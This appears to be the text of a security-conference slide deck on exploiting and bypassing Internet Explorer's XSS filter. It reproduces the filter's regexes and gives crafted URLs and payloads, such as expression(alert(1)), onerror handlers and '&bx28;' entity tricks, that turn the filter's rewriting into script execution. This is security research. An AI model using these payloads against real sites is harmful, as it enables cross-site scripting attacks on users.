SlideShare a Scribd company logo
X-XSS-Nightmare: 1; mode=attack
XSS Attacks
Exploiting XSS Filter
Masato Kinugawa
Self-Introduction
Masato Kinugawa
Self-Introduction
Masato Kinugawa
x
s
Self-Introduction
Masato Kinugawa
x
s
B
Bug-hunter's Joy
Self-Introduction
Today's topics
❶XSS technique
❷Bypass XSS filter technique
Using IE's XSS filter
XSS Filter
Chrome and Safari have the same function.
It was introduced from IE8.(2009)
Basic of XSS filter of IE
http://example.com/?q=<img+src=x+onerror=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
q param is: <img src=x onerror=alert(1)>
</body>
</html>
Before cut-off
If request and response are matched with
dangerous condition, XSS filter rewrites a page.
Like this #
http://example.com/?q=<img+src=x+onerror=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
q param is: <img src=x #nerror=alert(1)>
</body>
</html>
If request and response are matched with
dangerous condition, XSS filter rewrites a page.
After cut-off
Dangerous condition
It isn't documented in particular.
We can see the loading binary to browser of dll
include regex of cut-off strings.
The regex introduced by this slide is from here.
Inaccuracy of XSS Filter
If matched with the condition, XSS filter
rewrites a string unrelated to part of a
dynamic creation of user input.
http://example.com/?q=AAA&<meta+charset=
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
</head>
<body>
q param is: AAA
</body>
</html>
Nightmare: 1
JS execution from style
attribute
<p style="x:expression(alert(1))">
<p style="behavior:url(script.sct)">
expression() or behavior are possible.
Example of the style
attribute grammar.
<p style="x=expression(alert(1))">
Using colon instead of equal
(Compatibility mode only)
<p style="x:expression0028alert(1)0029">
<p style="x:expression&#x28;alert(1))">
Unicode escape of CSS
Numeric character references
Regex of style attribute
section in the filter.
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
First, end of attribute
Regex of style attribute
section in the filter.
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
Then, style=
Regex of style attribute
section in the filter.
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
Then, colon or equal
Regex of style attribute
section in the filter.
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
If string includes left bracket or
backslash, cut the request.
Regex of style attribute
section in the filter.
Attention here
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
If string includes more than 0 characters of
string equal to blank after "style", cut the
request.
[0x09-0x0D] OR
[0x20] OR / OR +
URL: ?/style+=:
/styleA=:
To the following request.
When below is output.
How does the XSS filter react?
Anatomizing blank section
Anatomizing blank section
One character between "style" and =
URL: ?/style+=:
/st#leA=:
To the following request.
When below is output.
Matched!
Anatomizing blank section
2 characters
URL: ?/style+=:
/st#leAA=:
To the following request.
When below is output.
Matched!
Anatomizing blank section
3 characters
URL: ?/style+=:
/st#leAAA=:
To the following request.
When below is output.
Matched!
Anatomizing blank section
4 characters
URL: ?/style+=:
/st#leAAAA=:
To the following request.
When below is output.
Matched!
Anatomizing blank section
5 characters
URL: ?/style+=:
/st#leAAAAA=:
To the following request.
When below is output.
Matched!
Anatomizing blank section
6 characters
URL: ?/style+=:
/st#leAAAAAA=:
To the following request.
When below is output.
Matched!
Anatomizing blank section
7 characters
URL: ?/style+=:
/styleAAAAAAA=:
To the following request.
When below is output.
Through
Anatomizing blank section
In 0 character,
URL: ?/style+=:
/st#le=:
To the following request.
When below is output.
Matched!
In short
URL: ?/style+=:
/st#le=:
/st#leA=:
/st#leAA=:
/st#leAAA=:
/st#leAAAA=:
/st#leAAAAA=:
/st#leAAAAAA=:
/styleAAAAAAA=:
=+ in the URL
Arbitrary 0-6 bytes
in the HTML
In ++,
URL: ?/style++=:
/st#leAAAAAAA=:
matched to 7 characters
Matched!
Width of 0-6 bytes
u000A (6bytes)
&#x0A; (6bytes)
The consideration of a case where
characters are replaced or deleted.
This width is changing from character(byte).
For example, / is 0-3 bytes
width.
URL: ?/style/=:
/st#le=:
/st#leA=:
/st#leAA=:
/st#leAAA=:
/styleAAAA=:
/styleAAAAA=:
/styleAAAAAA=:
/styleAAAAAAA=:
Last backslash
URL: ?/style=:
/st#le=:
/st#le=:aaa
Even outside of HTML reacts.
Example of correct cut-off of
style attribute
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="[XSS_HERE]">
</body>
</html>
URL: ?q=[XSS_HERE]
In this case,
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
</body>
</html>
URL: ?q="style="x:expression(alert(1))
You can attack like this.
but, if It includes the filter…
Example of correct cut-off of
style attribute
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""style="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
Matched!
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
...
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value=""st#le="x:expression(alert(1))">
...
URL: ?q⁼"style="x:expression(alert(1))
adequately
cut-off!
In this time, Cheat the filter
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
URL: ?q="<>
Nothing XSS
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
URL: ?q="<>
Attention here
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="&quot;&lt;&gt;">
</body>
</html>
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
Oh?!
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
URL: ?
Matching on
URL side
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
URL: ?/style
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
URL: ?/style++++++
Here is 31bytes
6 of + in the URL
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
URL: ?/style++++++=++
(Except =)
9 bytes, 2 of +
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
URL: ?/style++++++=++=
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
URL: ?/style++++++=++=
Matched!
[ /+t"'`]style[ /+t]*?
=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|
(61)|(3D));?)).*?([(]|(&[#()[].]x?
0*((40)|(28)|(92)|(5C));?))
<style>
body{background:gold}
</st#le>
</head>
<body>
<input name="q" value="">
URL: ?/style++++++=++=
?!
</st#le>
What will happen?
<style>
body{background:gold}
</style>
</head>
<body>
<input name="q" value="">
...
URL: ?/style++++++=++=
Original area
of style element
<style>
body{background:gold}
</st#le>
</head>
<body>
<input name="q" value="">
...
URL: ?/style++++++=++=
The area of style
element after cut-off.
<style>
body{background:gold}
</st#le>
</head>
<body>
<input name="q" value="
{}*{x:expression(alert(1))}">
URL:
?q=%0A{}*{x:expression(alert(1))}&
/style++++++=++=
Like this…
<style>
body{background:gold}
</st#le>
</head>
<body>
<input name="q" value="
{}*{x:expression(alert(1))}">
URL:
?q=%0A{}*{x:expression(alert(1))}&
/style++++++=++=
Nightmare: 2
javascript:Cut-off regex
of link
{(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|(
41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)
|(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(
([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[
].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|
A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73)
);?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;)))
)*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|(
52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;
)|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(&
(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[
].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10
)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7
4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;)
)))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).}
Make it easy to see
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
Make it easy to see
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
Includes j,
Make it easy to see
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
Includes tab or newline character more than 0 characters,
Make it easy to see
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
Includes a,
Make it easy to see
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
Includes tab or newline character more than 0 characters…
Make it easy to see
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
Those continue until the colon of "javascript:".
(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
. . .
(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))
([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(new
line;))))*
(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).
After the colon, arbitrary one character.
Make it easy to see
Cheat the filter again
<script type="text/javascript">a=1</script>
<script>
var q="[USER_INPUT]";
</script>
We assume that the designated string from the user is
stocked.(※ For simplicity, we consider It's already
outputting the string except URL parameter.)
Cheat the filter again
<script type="text/javascript">a=1</script>
<script>
var q="</script>"";
</script>
XSS measure is
also appropriate!
Cheat the filter again
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
We assume that the attacker
chose this string.
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
Then, we assume that the attacker
leads the user to this URL.
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
24bytes
4 of [0x0A] in URL
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
10bytes
2 of [0x0A] in URL
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
<script type="text/javascript">a=1</script>
<script>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
Matched!
<script type="text/javascript">a=1</script>
<sc#ipt>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
?!
<sc#ipt>
What will happen?
<script type="text/javascript">a=1</script>
<sc#ipt>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
This is not inside script tag!
<script type="text/javascript">a=1</script>
<sc#ipt>
var q=":<img src=x onerror=alert(1)>";
</script>
URL: ?java%0A%0A%0A%0Ascript%0A%0A:
Nightmare: 3
<body>
<script>
var q="";abc.def=";
</script>
</body>
URL: ?q=";abc.def=
The character which passes
through literal and
assignment of property access
Example of correct filter
(string literal)
<body>
<script>
var q="";abc#def=";
</script>
</body>
URL: ?q=";abc.def=
Example of correct filter
(string literal)
The filter replaces "." for cut-off.
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
Filter's regex
of string literal
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<body>
<script>
var q="";abc.def=";
</script>
</body>
URL: ?q=";abc.def=
Matched!
Cheat the filter one more
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
We assume that code of only
loading external script is here.
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"/
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"/++
11bytes 2 of +
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"/++.
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"/++.+++
16bytes 3 of +
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co.jp/test.js"
type="text/javascript">
</script>
URL: ?"/++.+++= Matched!
["'][ ]*
(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
<script
src="//example.co#jp/test.js"
type="text/javascript">
</script>
URL: ?"/++.+++=
?!
<script
src="//example.co#jp/test.js"
type="text/javascript">
</script>
What will happen?
<script
src="//example.co#jp/test.js"
type="text/javascript">
</script>
This is not loading from example.co.jp,
loading from example.co!
<script
src="//example.co#jp/test.js"
type="text/javascript">
</script>
["'][ ]*(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
...
<link rel="stylesheet"
href="../1.css">
<link rel="stylesheet"
href="../2.css">
</head>
...
<input name="q" value="[USER_INPUT]">
URL: ?q=[USER_INPUT]
The page of loading
CSS and outputting
user's input.
["'][ ]*(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
...
<link rel="stylesheet"
href="../1.css">
<link rel="stylesheet"
href="../2.css">
</head>
...
<input name="q" value="[USER_INPUT]">
URL: ?q=[USER_INPUT]&"+=+.++++=
Matched!
["'][ ]*(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
...
<link rel="stylesheet"
href="#./1.css">
<link rel="stylesheet"
href="../2.css">
</head>
...
<input name="q" value="[USER_INPUT]">
URL: ?q=[USER_INPUT]&"+=+.++++=
?!
<link
rel="stylesheet"
href="#./1.css">
What will happen?
["'][ ]*(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
...
<link rel="stylesheet"
href="#./1.css">
<link rel="stylesheet"
href="../2.css">
</head>
...
<input name="q" value="[USER_INPUT]">
URL: ?q=[USER_INPUT]&"+=+.++++=
This is loading this as
CSS.
["'][ ]*(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
...
<link rel="stylesheet"
href="#./1.css">
<link rel="stylesheet"
href="../2.css">
</head>
...
<input name="q" value="
{}*{x:expression(alert(1))}">
URL: ?q=%0A{}*{x:expression(alert(1))}&"+=+.++++=
Like this…
["'][ ]*(([^a-z0-9~_:'" ])|(in))
.+?[.].+?=
...
<link rel="stylesheet"
href="#./1.css">
<link rel="stylesheet"
href="../2.css">
</head>
...
<input name="q" value="
{}*{x:expression(alert(1))}">
URL: ?q=%0A{}*{x:expression(alert(1))}&"+=+.++++=
Nightmare: 4
Bypass 1: expression()
<p style=v:expression&bx28;alert&bx28;1))>s:
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:
If simple XSS is here,
It should write &#x28;but write &bx28;.
<p style=v:expression&bx28;alert&bx28;1))>s:
Something is here!
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:
Bypass 1: expression()
Rignt, vbs: and vbscript:
are cut-off targets.
(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(([#
()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|
(&[#()[].]x?0*((66)|(42)|(98)|(62));?))([t]|(&(([#()[
].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#
()[].]x?0*((83)|(53)|(115)|(73));?))([t]|(&(([#()[].
]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&[#()
[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?
0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[]
.]x?0*((82)|(52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(
9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&[#()[].]x
?0*((73)|(49)|(105)|(69));?))([t]|(&(([#()[].]x?0*(9|(
13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[].]x?0*
((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)
|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((8
4)|(54)|(116)|(74));?))([t]|(&(([#()[].]x?0*(9|(13)|(1
0)|A|D);?)|(tab;)|(newline;))))*)?(:|(&(([#()[].]x?0*((
58)|(3A));?)|(colon;)))).
<p style=v:expression&bx28;alert&bx28;1))>s:
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:&v%0A%0Ab%0A%0A%0A%0A%0As:
I adjusted URL for reaction of vbs:.
Before cut-off
Bypass 1: expression()
<p style=v:expression&#x28;alert&bx28;1))>s:
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:&v%0A%0Ab%0A%0A%0A%0A%0As:
It created the left parenthesis.(&#x28;)
After cut-off
Bypass 1: expression()
<p style=v:expression&#x28;alert&bx28;1))>s:
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:&v%0A%0Ab%0A%0A%0A%0A%0As:&v%0
A%0A%0A%0Ab%0A%0A%0As:
One More!
Before cut-off
Bypass 1: expression()
<p style=v:expression&#x28;alert&#x28;1))>s:
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:&v%0A%0Ab%0A%0A%0A%0A%0As:&v%0
A%0A%0A%0Ab%0A%0A%0As:
Then…
After cut-off
Bypass 1: expression()
<p style=v:expression&#x28;alert&#x28;1))>s:
URL:
?q=<p+style=v:expression%26bx28%3Balert%26b
x28%3B1))>s:&v%0A%0Ab%0A%0A%0A%0A%0As:&v%0
A%0A%0A%0Ab%0A%0A%0As:
Bypass 1: expression()
Bypass 2: <a folder>
https://html5sec.org/#36
<a folder="javascript:alert(1)"
style="behavior:url(#default#Anch
orClick)">Click</a>
In the following, it can create the link for javascript:.
(Document mode of IE8- is necessary.)
Thanks, Mario!:)
URL:
?q=<a+folder="jav%26bx41%3Bscript:alert(1)"
